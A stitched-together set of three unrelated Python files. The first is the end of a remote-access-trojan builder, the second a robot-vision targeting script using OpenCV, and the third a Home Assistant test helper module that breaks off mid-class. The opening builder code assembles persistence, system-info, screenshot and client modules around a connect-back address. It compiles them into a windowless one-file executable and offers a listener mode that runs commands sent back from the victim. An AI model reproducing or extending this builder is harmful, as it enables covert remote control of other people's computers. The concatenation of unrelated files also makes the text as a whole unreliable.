self.execute(val.split(" "))
def close(self):
self.SOCKET.close()
class GENERATOR:
data = ""
flname = ""
def __init__(self, prs):
self.address = prs.address
self.port = prs.port
self.source = prs.source
self.persistence = prs.persistence
self.output = self.get_output(prs.output)
self.pather = self.get_path()
self.v_imports = self.get_imports()
self.v_consts = self.get_consts()
self.v_persistence = self.get_persistence()
self.v_sysinfo = self.get_sysinfo()
self.v_screenshot = self.get_screenshot()
self.v_client = self.get_client()
self.v_main = self.get_main()
def get_output(self, out):
rtval = ""
if self.source:
if not out.endswith(".py"):
rtval = (out + ".py")
else:
rtval = out
else:
if platform.system() == "Windows":
if not out.endswith(".exe"):
rtval = (out + ".exe")
else:
rtval = out
elif platform.system() == "Linux":
rtval = (out)
else:
pull.exit("Unrecognized Platform")
return rtval
def get_path(self):
dirname = os.path.dirname(__file__)
dirname = os.path.join(dirname, 'mods')
if os.path.isdir(dirname):
return dirname
else:
pull.exit("Files missing to generate the payload!")
def get_imports(self):
topen = os.path.join(self.pather, 'imports.py')
fl = open(topen)
data = fl.read()
fl.close()
return data
def get_consts(self):
data = "CONSTIP = \"%s\"\nCONSTPT = %i" % (self.address, self.port)
return data
def get_persistence(self):
topen = os.path.join(self.pather, "persistence.py")
fl = open(topen)
data = fl.read()
fl.close()
return data
def get_sysinfo(self):
topen = os.path.join(self.pather, 'sysinfo.py')
fl = open(topen)
data = fl.read()
fl.close()
return data
def get_screenshot(self):
topen = os.path.join(self.pather, 'screenshot.py')
fl = open(topen)
data = fl.read()
fl.close()
return data
def get_client(self):
topen = os.path.join(self.pather, 'client.py')
fl = open(topen)
data = fl.read()
fl.close()
return data
def get_main(self):
topen = os.path.join(self.pather, 'main.py')
fl = open(topen)
data = fl.read()
fl.close()
return data
def tmp_dir(self):
dirname = os.path.dirname(__file__)
dirname = os.path.join(dirname, 'tmp')
if not os.path.isdir(dirname):
os.mkdir(dirname)
fname = os.path.join(dirname, 'cl.py')
return (dirname, fname, 'cl.py')
def patch(self):
time.sleep(2)
pull.function("Compiling modules ... ")
self.data = self.v_imports + "\n\n" + self.v_consts + "\n" + self.v_persistence + "\n" + self.v_sysinfo + "\n\n" + \
self.v_screenshot + "\n\n" + self.v_client + "\n\n" + self.v_main
time.sleep(2)
pull.function("Generating source code ...")
fl = open(self.output, 'w')
fl.write(self.data)
fl.close()
time.sleep(2)
pull.print("Code generated successfully!")
pull.print("File: " + self.output)
def generate(self):
time.sleep(2)
pull.function("Compiling modules ... ")
self.data = self.v_imports + "\n\n" + self.v_consts + "\n\n" + self.v_persistence + "\n\n" + self.v_sysinfo + "\n\n" + \
self.v_screenshot + "\n\n" + self.v_client + "\n\n" + self.v_main
time.sleep(2)
pull.function("Generating one time code for binary ")
self.flname = self.tmp_dir()
fl = open(self.flname[1], 'w')
fl.write(self.data)
fl.close()
pull.print("Code generated successfully!")
def compile(self):
pull.function("Compiling generated code /\\")
counter = 1
t = threading.Thread(target=PyInstaller.__main__.run, args=([
'--name=%s' % os.path.basename(self.output),
'--onefile',
'--windowed',
'--log-level=ERROR',
'--distpath=%s' % os.path.dirname(self.output),
'--workpath=%s' % self.flname[0],
os.path.join(self.flname[0], self.flname[2])
],),)
t.daemon = True
t.start()
while t.is_alive():
sys.stdout.write("\r" + pull.BLUE + "[" + pull.UNDERLINE + ":" + pull.END + pull.BLUE + "] " + pull.END + "Elapsed Time: %is" % (counter) + pull.END)
time.sleep(1)
counter += 1
sys.stdout.write("\n")
pull.print("Compiled Successfully!")
def clean(self):
pull.function("Cleaning files and temporary codes")
shutil.rmtree(self.flname[0])
pull.print("File: " + self.output)
class PARSER:
COMMANDS = ['bind', 'generate']
def __init__(self, prs):
self.mode = self.v_mode(prs.mode, prs.help)
self.help = self.v_help(prs.help)
if self.mode == "bind":
self.address = self.v_address(prs.address)
self.port = self.v_port(prs.port)
elif self.mode == "generate":
self.address = self.v_address(prs.address)
self.port = self.v_port(prs.port)
self.output = self.v_output(prs.output)
self.source = prs.source
self.persistence = prs.persistence
def v_help(self, hl):
if hl:
if not self.mode:
pull.help_overall()
else:
if self.mode == "bind":
pull.help_bind()
elif self.mode == "generate":
pull.help_generate()
else:
pull.help_help()
def v_address(self, str):
return str
def v_port(self, port):
if not port:
pull.exit("You need to Supply a Valid Port Number")
if port <= 0 or port > 65535:
pull.exit("Invalid Port Number")
return port
def v_mode(self, val, hl):
if val:
if val in self.COMMANDS:
return val
else:
pull.exit("No such command found in database")
else:
if not hl:
pull.exit("Invalid Syntax. Refer to the manual!")
def v_output(self, val):
if val:
if os.path.isdir(os.path.dirname(val)):
return val
else:
pull.exit("Directory doesn't exist!")
else:
pull.exit("You must provide an output Path!")
def main():
pull.logo()
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('mode', nargs="?", help="Moder")
parser.add_argument('-h', '--help' , dest="help" , default=False, action="store_true", help="Help Manual")
parser.add_argument('-a', '--address', dest="address", default="", type=str, help="Address to Bind to")
parser.add_argument('-p', '--port' , dest="port" , default=0 , type=int, help="Port to Bind to")
parser.add_argument('-o', '--output' , dest="output" , default="", type=str, help="Complete Path to Output File!")
parser.add_argument('-s', '--source' , dest="source" , default=False, action="store_true", help="Source file")
parser.add_argument('--persistence' , dest="persistence", default=False, action="store_true", help="Persistence")
parser = parser.parse_args()
parser = PARSER(parser)
if parser.mode == "bind":
iface = INTERFACE(parser)
iface.bind()
iface.accept()
iface.launch()
iface.close()
elif parser.mode == "generate":
pull.function("Starting Generator Mode!")
generator = GENERATOR(parser)
if generator.source:
generator.patch()
else:
generator.generate()
generator.compile()
generator.clean()
pull.function("Done")
if __name__ == "__main__":
main()
|
computerVisionAnimation.py
|
#!/usr/bin/python3
# NOTE: SET THE CAMERA MATRIX CORRECTLY!!
import cv2
import time
import numpy as np
import math
import pickle as pkl
import statistics
from threading import Thread
from computerVisionFunctions import process_image, rotation_vector_list, translation_vector_list, get_contour_corners, \
rotate_contours
# Options: video, realsense, image, prerecorded
INPUT_DEVICE = "prerecorded"
SERVER_IP = "10.28.98.2"
DISPLAY = True
NETWORK_TABLES = False
FRAME_BY_FRAME = False
DEBUG_PRINT = False
CAMERA_ID = 2
VIDEO_NAME = "example.avi"
mtx = None
dist = None
img_org = None
webcam = None
pipeline = None
class WebcamVideoStream:
def __init__(self, src=0, name="WebcamVideoStream"):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
# initialize the thread name
self.name = name
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
t = Thread(target=self.update, name=self.name, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.grabbed, self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
if NETWORK_TABLES:
from networktables import NetworkTables
import logging
logging.basicConfig(level=logging.DEBUG)
NetworkTables.initialize(server=SERVER_IP)
sd = NetworkTables.getTable("SmartDashboard")
if INPUT_DEVICE == "realsense":
# Semi-deprecated
import pyrealsense2 as rs
# Camera pipeline
pipeline = rs.pipeline()
config = rs.config()
config.enable_stream(rs.stream.color, 1280, 720, rs.format.bgr8, 30)
# Start streaming
pipeline.start(config)
def median_of_vector(vector):
list_of_item_1 = []
list_of_item_2 = []
list_of_item_3 = []
for b in vector:
list_of_item_1.append(b[0])
list_of_item_2.append(b[1])
list_of_item_3.append(b[2])
return np.array([statistics.median(list_of_item_1),
statistics.median(list_of_item_2),
statistics.median(list_of_item_3)])
def solve_pnp_code(contours_inp):
# pairs = []
# distances = []
# for cont in contours_inp:
if type(contours_inp) != list:
contours_inp = np.array(contours_inp)
# filtered_contours = contours_inp
filtered_contours = contours_inp
# Rotate, see diagram:
"""
/ -_
/ --__
/ /
/ /
/ /
/___ /
-_____/ < hard to tell where point is exactly
/\__
/ \__
/ \_
/ /
/ /
/ /
\__ /
\____ /
\/ < more angled, and easier to find bottom corner
"""
left, right = get_contour_corners([filtered_contours[0], filtered_contours[1]])
left = np.array(left)
right = np.array(right)
# Rotate points back
left = rotate_contours(-30, left)
right = rotate_contours(30, right)
"""
Points of target in px (300 px per inch)
(413, 0), (996, 149), (0,1599), (584, 1748)
(1.39, 0), (3.32, 0.497), (0, 5.33), (1.943, 5.827)
top left, top right, bottom left, bottom right
(3409, 149), (3992, 0), (3821, 1748), (4405, 1559)
Points in inches
(11.363, 0.479), (13.293, 0), (12.74, 5.827), (14.683, 5.33)
(1.39, 0), (3.32, 0.497), (0, 5.33), (1.943, 5.827), (11.363, 0.479), (13.293, 0), (12.74, 5.827), (14.683, 5.33)
"""
# PS3 camera distortion matrix
# matrix2 = [[515.45484128, 0, 285.10931073], [0, 518.05417133, 281.68350735], [0, 0, 1]]
camera_matrix = np.array(mtx, dtype=np.float32)
# PS3 camera distortion
# distortion = np.array([-0.13552493, 0.05373435, 0.0118757, -0.00876742, 0.16312619], dtype=np.float64)
points = np.array([left, right], dtype=np.float32)
new_points = []
points = np.squeeze(points)
points = np.ndarray.tolist(points)
# Format points
for z in points:
for X in z:
new_points.append(X)
new_points = np.array(new_points, dtype=np.float32)
new_points = np.squeeze(new_points)
image_points = []
for d in new_points:
image_points.append([d])
image_points = np.array(image_points, dtype=np.int32)
'''
objectPoints = [(1.39, 0), (3.32, 0.497), (0, 5.33), (1.943, 5.827), (11.363, 0.479), (13.293, 0),
(12.74, 5.827), (14.683, 5.33)]
'''
# Real world points in inches
# object_points = [(3.32, 0.497), (1.943, 5.827), (11.363, 0.479), (12.74, 5.827)]
# object_points = [(1.39, 0), (0, 5.33), (13.293, 0), (14.683, 5.33)]
object_points = [(13.249681, 0), (14.626771, 5.324812), (1.37709, 0), (0, 5.324812)]
# object_points = np.array([[1.39, 0], [3.32, 0.497], [12.74, 5.827], [14.683, 5.33]])
# objectPoints = np.array([(1.39, 0), (0, 5.53), (13.293, 0), (14.63, 5.33)], dtype=np.float32)
# Format points
object_points = np.array(object_points, dtype=np.float32)
object_points2 = []
# Move (0, 0) to center
for pnt in object_points:
object_points2.append([pnt[0] - (14.683 / 2), pnt[1] - (5.827 / 2)])
object_points = np.array(object_points2, dtype=np.float32)
object_points2 = []
# Add third dimension to points
for y in object_points:
object_points2.append([y[0], y[1], 0])
# objectPoints = np.ascontiguousarray(objectPoints2[:, :3]).reshape((8, 1, 3))
object_points = np.ascontiguousarray(object_points2)
# Highlight points being used
if DISPLAY and img_org:
cv2.drawContours(img_org, image_points, -1, (255, 255, 200), 10)
cv2.imshow("highlighted", img_org)
debug_print("begin solevepnp")
image_points = np.array(image_points, dtype=np.float32)
# Do solvepnp
# print(image_points)
mystery_value, rotation_vector, translation_vector = cv2.solvePnP(object_points, image_points, camera_matrix, dist)
# print("translation")
# print(translation_vector)
# print("rotation")
# print(rotation_vector)
# Take averages over 5 frames
translation_vector_list.append(translation_vector)
rotation_vector_list.append(rotation_vector)
avg_translation = translation_vector
avg_rotation = rotation_vector
if len(translation_vector_list) > 5:
translation_vector_list.pop(0)
rotation_vector_list.pop(0)
avg_rotation = median_of_vector(rotation_vector_list)
avg_translation = median_of_vector(translation_vector_list)
# for b in rotation_vector_list:
# avg_rotation[0] += b[0] / 5
# avg_rotation[1] += b[1] / 5
# avg_rotation[2] += b[2] / 5
# for b in translation_vector_list:
# avg_translation[0] += b[0] / 5
# avg_translation[1] += b[1] / 5
# avg_translation[2] += b[2] / 5
# avg_rotation = np.array(avg_rotation)
# avg_translation = np.array(avg_translation)
# print("average rotation vector")
# print(np.array(avg_rotation))
# print("average translation vector")
# print(np.array(avg_translation))
return rotation_vector, translation_vector, avg_rotation, avg_translation, image_points
def compute_output_values(rotation_vec, translation_vec):
# Compute the necessary output distance and angles
x = translation_vec[0][0] + 0
z = 0 * translation_vec[1][0] + 1 * translation_vec[2][0]
# distance in the horizontal plane between robot center and target
robot_distance = math.sqrt(x**2 + z**2)
# horizontal angle between robot center line and target
robot_to_target_angle = math.atan2(x, z)
rot, _ = cv2.Rodrigues(rotation_vec)
rot_inv = rot.transpose()
# version if there is not offset for the camera (VERY slightly faster)
# pzero_world = numpy.matmul(rot_inv, -tvec)
# version if camera is offset
pzero_world = np.matmul(rot_inv, 0 - translation_vec)
other_angle = math.atan2(pzero_world[0][0], pzero_world[2][0])
return robot_distance, robot_to_target_angle, other_angle
def debug_print(text):
if DEBUG_PRINT:
print(text)
else:
return text
if INPUT_DEVICE == "realsense" or INPUT_DEVICE == "video" or INPUT_DEVICE == "prerecorded":
# Import camera matrix
with open('camera_calibration2.pkl', 'rb') as f:
ret, mtx, dist, rotation_vectors, translation_vectors = pkl.load(f)
if INPUT_DEVICE == "image":
webcam = cv2.imread("my_photo-3.jpg")
webcam = cv2.resize(webcam, (640, 480))
def cut_image(img, points):
points2 = points
if type(points) == list:
points2 = np.array(points)
r = cv2.boundingRect(points2)
return img[r[1]:r[1] + r[3], r[0]:r[0] + r[2]]
camera1 = cv2.VideoWriter("camera1_feed.mkv", "X264".encode("utf-8"), fps=30)
camera2 = cv2.VideoWriter("camera2_feed.mkv", "X264".encode("utf-8"), fps=30)
camera3 = cv2.VideoWriter("camera3_feed.mkv", "X264".encode("utf-8"), fps=30)
camera4 = cv2.VideoWriter("camera4_feed.mkv", "X264".encode("utf-8"), fps=30)
camera5 = cv2.VideoWriter("camera5_feed.mkv", "X264".encode("utf-8"), fps=30)
camera6 = cv2.VideoWriter("camera6_feed.mkv", "X264".encode("utf-8"), fps=30)
def vision_code(original_image):
image_org = None
if INPUT_DEVICE == "image":
image_org = webcam
if INPUT_DEVICE == "video" or INPUT_DEVICE == "prerecorded":
image_unchanged = original_image
# if not got_image:
# return None, None, None
image_unchanged = cv2.resize(image_unchanged, (640, 480))
camera1.write(image_unchanged)
# print(image_unchanged.size())
image_unchanged = cv2.undistort(image_unchanged, mtx, dist)
camera2.write(image_unchanged)
# image_unchanged.resize((640, 480))
image_org = image_unchanged
# image_unchanged = cv2.resize(image_unchanged, (640, 480))
# image_unchanged = cv2.undistort(image_unchanged, mtx, dist)
if INPUT_DEVICE == "realsense":
frames = pipeline.wait_for_frames()
color_frame = frames.get_color_frame()
color_image = np.asanyarray(color_frame.get_data())
image_org = color_image
cv2.imshow("realsense", image_org)
debug_print("Begin processing")
frame = process_image(image_org)
camera3.write(frame)
debug_print("Finish processing")
# Display output of pipeline
if DISPLAY:
cv2.imshow("Frame", frame)
# Get contours
_, contours, _ = cv2.findContours(frame, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
new_contours = contours
debug_print("Got contours")
# Filter contours based on perimeter-to-area ratio
simplified = []
if len(new_contours) > 1:
matched = []
good_ratio = []
for cnt in new_contours:
if cv2.contourArea(cnt) > 50:
ratio = cv2.arcLength(cnt, True) / cv2.contourArea(cnt)
maximum = 0
minimum = 100000
for w in cnt:
if w[0][0] > maximum:
maximum = w[0][0]
if w[0][0] < minimum:
minimum = w[0][0]
if ratio < 0.5:
# 0.3
# and maximum < 610 and minimum > 80
simplified.append(cnt)
good_ratio.append(True)
if len(simplified) > 1:
closest_contours = []
contour_list = []
confirmed_pairs = []
main_count = 0
for contour in simplified:
moments = cv2.moments(contour)
x_cent = int(moments['m10'] / moments['m00'])
y_cent = int(moments['m01'] / moments['m00'])
contour_list.append([x_cent, y_cent, contour])
# contour_list = sorted(contour_list, key=itemgetter(0))
for data in contour_list:
x_cent = data[0]
closest_value = 9999999
closest_data = []
closest_count = 0
count = 0
for test in contour_list:
x_difference = abs(test[0] - x_cent)
if main_count not in matched:
if x_difference < closest_value and x_difference != 0:
closest_count = count
closest_value = x_difference
closest_data = test
count += 1
matched.append(main_count)
matched.append(count)
confirmed_pairs.append([main_count, closest_count])
closest_contours.append(closest_data)
main_count += 1
double_confirmed = []
double_confirmed_list = []
for x in confirmed_pairs:
if x[0] == confirmed_pairs[x[1]][1]:
x_list = contour_list[x[0]][2]
n_list = contour_list[x[1]][2]
cv2.drawContours(img_org, new_contours, 1, (255, 0, 0), 25)
if [x[1], x[0]] not in double_confirmed_list and len(x_list) > 2 and len(n_list) > 2:
double_confirmed.append([n_list, x_list])
double_confirmed_list.append(x)
confirmed_contours = double_confirmed
debug_print("End contour filter")
if True:
robot_distance = None
first_angle = None
second_angle = None
for i in confirmed_contours:
debug_print("Begin solvepnp")
rotation_vector, translation_vector, average_rotation, average_translation, img_pts = \
solve_pnp_code(i)
debug_print("End solvepnp")
# PS3 camera matrix
# matrix2 = [[515.45484128, 0, 285.10931073], [0, 518.05417133, 281.68350735], [0, 0, 1]]
if DISPLAY:
# mult = 10
# add = 10
# image_org = draw(image_org, [(14.626771 * mult + add, 5.324812 * mult), (13.249681 *
# mult + add
# , 0),
# (0 + add, 5.324812 * mult)]
# , img_pts)
debug_print("Drawing axis")
cv2.aruco.drawAxis(image_org, mtx, dist, rotation_vector, translation_vector, 10)
cv2.imshow("axis", image_org)
debug_print("Doing Rodriques")
# destination = cv2.Rodrigues(rotation_vector)[0]
robot_distance, first_angle, second_angle = compute_output_values(average_rotation,
average_translation)
debug_print("finished")
# print("robot_distance")
# print(robot_distance)
print(str(math.degrees(first_angle)) + ", " + str(math.degrees(second_angle)))
if NETWORK_TABLES:
sd.putNumber("robot_distance", robot_distance)
sd.putNumber("angle_a", math.degrees(first_angle))
sd.putNumber("angle_b", math.degrees(second_angle))
NetworkTables.flush()
# break
return robot_distance, first_angle, second_angle
return None, None, None
repetitions = 0
startTime = time.monotonic()
# for o in list_thing:
if True:
# distance_list = []
# angle1_list = []
# angle2_list = []
# if not o:
# continue
if INPUT_DEVICE == "prerecorded":
webcam = cv2.VideoCapture(VIDEO_NAME)
if INPUT_DEVICE == "video":
import os
# video_name = "folder_of_videos/my_video-" + o[0] + "_newer.mkv"
# webcam = cv2.VideoCapture(video_name)
# webcam = cv2.VideoCapture(CAMERA_ID)
os.system("v4l2-ctl --device " + str(CAMERA_ID) + " -c exposure_auto=1")
time.sleep(1)
print("auto")
os.system("v4l2-ctl --device " + str(CAMERA_ID) + " -c white_balance_temperature_auto=0")
time.sleep(1)
print("balance")
os.system("v4l2-ctl --device " + str(CAMERA_ID) + " -c white_balance_temperature=3004")
time.sleep(1)
print("temp")
# webcam = cv2.VideoCapture(CAMERA_ID)
time.sleep(1)
os.system("v4l2-ctl --device " + str(CAMERA_ID) + " -c exposure_absolute=8")
# webcam.set(15, 8)
print("exposure")
time.sleep(1)
webcam = WebcamVideoStream(CAMERA_ID).start()
distance = "blah blah blah"
counter = 0
while True:
if FRAME_BY_FRAME:
while True:
if cv2.waitKey(1) & 0xFF == ord("x"):
break
if INPUT_DEVICE == "video" or INPUT_DEVICE == "prerecorded":
if cv2.waitKey(1) & 0xFF == ord("q"):
break
ret, image = webcam.read()
if counter > 0:
counter -= 0.1
if not ret:
counter += 1
print("This shouldn't happen (image not captured successfully)")
if counter > 30:
print("Exiting code, camera/video not responding")
exit(1)
continue
distance, angle1, angle2 = vision_code(image)
# if not distance:
# continue
# distance_list.append(distance)
# angle1_list.append(angle1)
# angle2_list.append(angle2)
# time.sleep(0.02)
repetitions += 1
if repetitions >= 1000:
print("average time per cycle = ", (time.monotonic() - startTime) / 1000, "seconds")
print("average FPS = ", 1 / ((time.monotonic() - startTime) / 1000))
startTime = time.monotonic()
repetitions = 0
if INPUT_DEVICE == "image":
while True:
if cv2.waitKey(1) & 0xFF == ord("q"):
break
if INPUT_DEVICE == "image":
break
# if len(distance_list) > 0:
# print("dist")
# print(float(o[1]) - statistics.median(distance_list))
# print("angle")
# print(float(o[2]) - statistics.median(angle1_list))
webcam.stop()
cv2.destroyAllWindows()
|
common.py
|
"""Test the helper method for writing tests."""
import asyncio
from datetime import timedelta
import functools as ft
import os
import sys
from unittest.mock import patch, MagicMock, Mock
from io import StringIO
import logging
import threading
from contextlib import contextmanager
from homeassistant import core as ha, loader, config_entries
from homeassistant.setup import setup_component, async_setup_component
from homeassistant.config import async_process_component_config
from homeassistant.helpers import (
intent, entity, restore_state, entity_registry,
entity_platform)
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.dt as date_util
import homeassistant.util.yaml as yaml
from homeassistant.const import (
STATE_ON, STATE_OFF, DEVICE_DEFAULT_NAME, EVENT_TIME_CHANGED,
EVENT_STATE_CHANGED, EVENT_PLATFORM_DISCOVERED, ATTR_SERVICE,
ATTR_DISCOVERED, SERVER_PORT, EVENT_HOMEASSISTANT_CLOSE)
from homeassistant.components import mqtt, recorder
from homeassistant.util.async import (
run_callback_threadsafe, run_coroutine_threadsafe)
_TEST_INSTANCE_PORT = SERVER_PORT
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), 'testing_config', *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
if sys.platform == "win32":
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
hass = loop.run_until_complete(async_test_home_assistant(loop))
stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
stop_event.set()
orig_stop = hass.stop
def start_hass(*mocks):
"""Start hass."""
run_coroutine_threadsafe(hass.async_start(), loop=hass.loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
@asyncio.coroutine
def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant(loop)
hass.config_entries = config_entries.ConfigEntries(hass, {})
hass.config_entries._entries = []
hass.config.async_load = Mock()
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
def async_add_job(target, *args):
"""Add a magic mock."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_job(target, *args)
hass.async_add_job = async_add_job
hass.config.location_name = 'test home'
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone('US/Pacific')
hass.config.units = METRIC_SYSTEM
hass.config.skip_pip = True
if 'custom_components.test' not in loader.AVAILABLE_COMPONENTS:
yield from loop.run_in_executor(None, loader.prepare, hass)
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
@asyncio.coroutine
def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch('homeassistant.core._async_create_timer'), \
patch.object(hass, 'async_stop_track_tasks'):
yield from orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def get_test_instance_port():
"""Return unused port for running test instance.
The socket that holds the default port does not get released when we stop
HA in a different test case. Until I have figured out what is going on,
let's run each test on a different port.
"""
global _TEST_INSTANCE_PORT
_TEST_INSTANCE_PORT += 1
return _TEST_INSTANCE_PORT
@ha.callback
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@asyncio.coroutine
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(
domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
@asyncio.coroutine
def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode('utf-8')
msg = mqtt.Message(topic, payload, qos, retain)
hass.async_run_job(hass.data['mqtt']._mqtt_on_message, None, None, msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, time):
"""Fire a time changes event."""
hass.bus.async_fire(EVENT_TIME_CHANGED, {'now': time})
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: service,
ATTR_DISCOVERED: info
})
def load_fixture(filename):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), 'fixtures', filename)
with open(path, encoding='utf-8') as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {
'entity_id': new_state.entity_id,
'new_state': new_state,
}
if old_state:
event_data['old_state'] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data)
@asyncio.coroutine
def async_mock_mqtt_component(hass, config=None):
"""Mock the MQTT component."""
if config is None:
config = {mqtt.CONF_BROKER: 'mock-broker'}
with patch('paho.mqtt.client.Client') as mock_client:
mock_client().connect.return_value = 0
mock_client().subscribe.return_value = (0, 0)
mock_client().publish.return_value = (0, 0)
result = yield from async_setup_component(hass, mqtt.DOMAIN, {
mqtt.DOMAIN: config
})
assert result
hass.data['mqtt'] = MagicMock(spec_set=hass.data['mqtt'],
wraps=hass.data['mqtt'])
return hass.data['mqtt']
mock_mqtt_component = threadsafe_coroutine_factory(async_mock_mqtt_component)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError("Component {} is already setup".format(component))
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
registry.entities = mock_entries or {}
hass.data[entity_registry.DATA_REGISTRY] = registry
return registry
class MockModule(object):
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(self, domain=None, dependencies=None, setup=None,
requirements=None, config_schema=None, platform_schema=None,
async_setup=None, async_setup_entry=None,
async_unload_entry=None):
"""Initialize the mock module."""
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if setup is not None:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = mock_coro_func(True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
class MockPlatform(object):
"""Provide a fake platform."""
# pylint: disable=invalid-name
def __init__(self, setup_platform=None, dependencies=None,
platform_schema=None, async_setup_platform=None):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = mock_coro_func()
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self, hass,
logger=None,
domain='test_domain',
platform_name='test_platform',
scan_interval=timedelta(seconds=15),
parallel_updates=0,
entity_namespace=None,
async_entities_added_callback=lambda: None
):
"""Initialize a mock entity platform."""
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
scan_interval=scan_interval,
parallel_updates=parallel_updates,
entity_namespace=entity_namespace,
async_entities_added_callback=async_entities_added_callback,
)
class MockToggleDevice(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state):
"""Initialize the mock device."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the device if any."""
self.calls.append(('name', {}))
return self._name
@property
def state(self):
"""Return the name of the device if any."""
self.calls.append(('state', {}))
return self._state
@property
def is_on(self):
"""Return true if device is on."""
self.calls.append(('is_on', {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the device on."""
self.calls.append(('turn_on', kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the device off."""
self.calls.append(('turn_off', kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
elif method is None:
return self.calls[-1]
else:
try:
return next(call for call in reversed(self.calls)
if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(self, *, domain='test', data=None, version=0, entry_id=None,
source=config_entries.SOURCE_USER, title='Mock Title',
state=None):
"""Initialize a mock config entry."""
kwargs = {
'entry_id': entry_id or 'mock-id',
'domain': domain,
'data': data or {},
'version': version,
'title': title
}
if source is not None:
kwargs['source'] = source
if state is not None:
kwargs['state'] = state
super().__init__(**kwargs)
def add_to_hass(self, hass):
